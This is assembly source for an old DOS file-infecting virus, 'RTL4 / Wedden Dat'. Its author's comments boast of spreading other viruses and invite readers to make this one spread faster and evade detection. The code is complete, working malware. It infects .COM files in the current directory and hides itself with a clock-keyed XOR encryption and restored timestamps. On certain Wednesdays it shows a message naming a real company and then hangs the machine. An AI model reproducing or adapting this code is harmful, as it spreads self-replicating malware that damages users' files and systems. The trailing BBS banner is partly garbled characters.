2022-08-21 09:07:57 +00:00
;******************************************************************************
;
; RTL4 / WEDDEN DAT... VIRUS
;
;******************************************************************************
;
; "If a weaking linkage found, eliminate...
; Hear the cities fearfull roar!"
;
; Now in front of you lies another source of a virus. It is not a very good
; one, but, as you might say, a virus is a virus. After my wake at the PC, I
; created several viruses, like:
;
; Deicide / Glenn
; Morgoth
; Breeze
; Brother
; Commentator I
; Commentator II
; Spawnie
; Xmas
; 1St_Star / 222
; T-1000
;
; Well, I bet you think this is a whole lot, but some are minor variants, for
; which I don't have the guts to publish the source code. I have to admid,
; Deicide and Morgoth have spread very well. I uploaded them to a BBS and it
; was downloaded several times, and it is not detected by antivirus program yet.
; Deicide is now detectable, but that was my first attempt to make a virus.
;
; This virus is a Non-Resident Direct Action .COM Infector.
; It only infects files in the current directory.
; You can recognize a infected file simply, the 4th byte is a '*' (just like
; the 1St_Star virus). It is inactive from January till May and starts
; replicating from May. After July, every Wednessday after the 21st the
; program will hang the system, showing the address of RTL4 Joop v/d Ende
; Productions.
;
; Disclaimer : This program is like all other virus sources only for
; educational purposes and should not be given to irresponsible hands
; (John McAfee and people like him).
;
; For the criminal reader : Don't just change the text of this virus and
; say you made a virus. Instead use some ideas from this virus and create your
; own virus if you want to be nasty. Additions to this virus that makes it
; spreading faster and makes it harder to detect are welcome, as long as I get
; the new source code.
;
; I want to thank several virus writers for their support with letting McAfee
; and Ass. earn his money with making so many updates of SCAN...
; Here they are : Bit Addict, XSTC, Dark Helmet, Dark Avenger, Nuke!, Cracker
; Jack and many more creators.
;
; Note to XSTC : Thank you for disassembling the Deicide virus, for I have lost
; the source code. Next time write a message, because I might have the source
; code of the virus ready, but not uploaded. It saves you time, so you may
; disassemble another virus (ofcourse only for educational purposes ;-) )
;
; Now have fun with this virus, written in A86 assembler version 3.22
;
; Glenn Benton
;
; "Is it truly a disembodied head lurking in the dark of the tombs of fate?"
;
Org 0h ; The outcome will be .BIN
Start: Jmp MainVir ; Jump to main virus
Db '*' ; signature
MainVir: Call On1 ; Get virus offset
On1: Pop BP ; BP is the index register
Sub BP , Offset MainVir + 3 ; Calculate virus offset
Push Ax ; And store AX (error reg.)
Lea Si , Crypt [ BP ] ; Decryptor for the
Mov Di , Si ; virus code. It's long
Mov Cx , CryptLen ; for a decoder, but it
Decrypt: Lodsb ; reduces the recognizable
Xor Al , 0 ; part enough.
Stosb ;
Loop Decrypt ;
DecrLen Equ $ - MainVir ; Decryptor length
Crypt: Mov Ax , Cs : OrgPrg [ BP ] ; Store the 4 first bytes
Mov Bx , Cs : OrgPrg [ BP ] + 2 ; of the host
Mov Cs : Start + 100h , Ax ;
Mov Cs : Start [ 2 ] + 100h , Bx ;
Mov Ah , 2ah ; Get date
Int 21h ; If it is a wednessday
Cmp Dh , 8 ; after July and after
Jb NoMsg ; the 21st, it will
Cmp Dl , 22 ; will continue, else
Jb NoMsg ; it goes to NoMsg
Cmp Al , 3 ;
Jne NoMsg ;
Mov Ah , 9 ; Display the message
Lea Dx , Msg [ BP ] ;
Int 21h ;
Lockout: Cli ; And lock the computer
Jmp Lockout ;
NoMsg: Cmp Dh , 5 ; Is it after April?
Jae DoVirus ; Yes - Replicate
Jmp Ready ; No - Terminate to host
DoVirus: Mov Ah , 1ah ; Move DTA to a safe place
Mov Dx , 0fc00h ; $FE00
Int 21h
Mov Ah , 4eh ;
Search: Lea Dx , FileSpec [ BP ] ; Search for a .COM file in
Xor Cx , Cx ; the current directory
Int 21h ;
Jnc Found ; If not exist, goto Ready
Jmp Ready ; else goto Found
Found: Mov Ax , 4300h ; Get file attributes
Mov Dx , 0fc1eh ; and store them on the stack
Int 21h ;
Push Cx ;
Mov Ax , 4301h ; Wipe the attributes, so it
Xor Cx , Cx ; is accessable for us
Int 21h ;
Mov Ax , 3d02h ; Open the file with
Int 21h ; read/write priority
Mov Bx , 5700h ; Get de file date/time stamp
Xchg Ax , Bx ; and store them on the stack
Int 21h ;
Push Cx ;
Push Dx ;
Mov Ah , 3fh ; Read the first 4 bytes
Lea Dx , OrgPrg [ BP ] ; of the program
Mov Cx , 4 ;
Int 21h ;
Mov Ax , Cs :[ OrgPrg ][ BP ] ; Is it a weird EXE?
Cmp Ax , 'MZ' ; Yes goto ExeFile
Je ExeFile ;
Cmp Ax , 'ZM' ; Is it a normal EXE?
Je ExeFile ; Yes, goto ExeFile
Mov Ah , Cs :[ OrgPrg + 3 ][ BP ] ; Is it already infected?
Cmp Ah , '*' ; No, goto Infect
Jne Infect ;
ExeFile: Call Cl ose ; Call File close
Mov Ah , 4fh ; Jump to the search routine
Jmp Search ; again for a .COM file
FSeek: Xor Cx , Cx ; Subroutine for jumping to
Xor Dx , Dx ; the begin/end of file
Int 21h ;
Ret ;
Infect: Mov Ax , 4202h ; Jump to EOF
Call FS eek ;
Sub Ax , 3 ; Calculate new virus offset
Mov Cs : CallPtr [ BP ] + 1 , Ax ;
Mov Ah , 2ch ; Get system time
Int 21h ;
Mov Cs : Decrypt + 2 [ BP ], Dl ; Move the decryptor part
Lea Si , MainVir [ BP ] ; with the 100ds second put
Mov Di , 0fd00h ; into the XOR command to
Mov Cx , DecrLen ; the end of the 64K segment
Rep Movsb ;
Lea Si , Crypt [ BP ] ; Encrypt the virus with
Mov Cx , CryptLen ; the 100ds seconds.
Encrypt: Lodsb ; Merge it behind the
Xor Al , Dl ; decryptor
Stosb ;
Loop Encrypt ;
Mov Ah , 40h ; Write the virus
Lea Dx , 0fd00h ; at the end of the
Mov Cx , VirLen ; file
Int 21h ;
Mov Ax , 4200h ; Move to start of
Call FS eek ; the file
Mov Ah , 40h ; Write the jump to the virus
Lea Dx , CallPtr [ BP ] ; at the begin of the file
Mov Cx , 4 ;
Int 21h ;
Call Cl ose ; Close the file
Ready: Mov Ah , 1ah ; Restore the DTA to the
Mov Dx , 80h ; original offset
Int 21h ;
Pop Ax ; Get (possible) error code
Mov Bx , 100h ; Strange jump (but nice) to
Push Cs ; the begin of the program
Push Bx ; (which has been restored)
Retf ;
Close: Pop Si ; A pop which is stupid
Pop Dx ; Restore files date/time
Pop Cx ; stamp
Mov Ax , 5701h ;
Int 21h ;
Mov Ah , 3eh ; Close file
Int 21h ;
Mov Ax , 4301h ; Restore attributes
Pop Cx ;
Mov Dx , 0fc1eh ;
Int 21h ;
Push Si ; A push which is stupid
Ret ; Return to caller
CallPtr Db 0e9h , 0 , 0 ; Jump
FileSpec Db '*.COM' , 0 ; Filesearch spec & signature
; Activation message
Msg Db 13 , 10 , 9 , 9 , 'RTL4'
Db 13 , 10 , 'Joop van den Ende Produkties BV'
Db 13 , 10 , 'Marco Daas (Casting Assistent)'
Db 13 , 10 , 'Postbus 397'
Db 13 , 10 , '1430 AJ AALSMEER'
Db 13 , 10 , 'van Cleeffkade 15'
Db 13 , 10 , '1413 BA AALSMEER'
Db 13 , 10 , 'The Netherlands'
Db 13 , 10 , 10 , 'Wedden dat... je een virus hebt?'
Db 13 , 10 , '$'
; First 4 bytes of the host program
OrgPrg: Int 20h
DB 'GB' ; My initials (Glenn Benton)
CryptLen Equ $ - Crypt ; Length of encrypted part
VirLen Equ $ - MainVir ; Length of virus
;
; Sleep well, sleep in hell...
;
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> > and Remember Don't Forget to Call <<3C> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
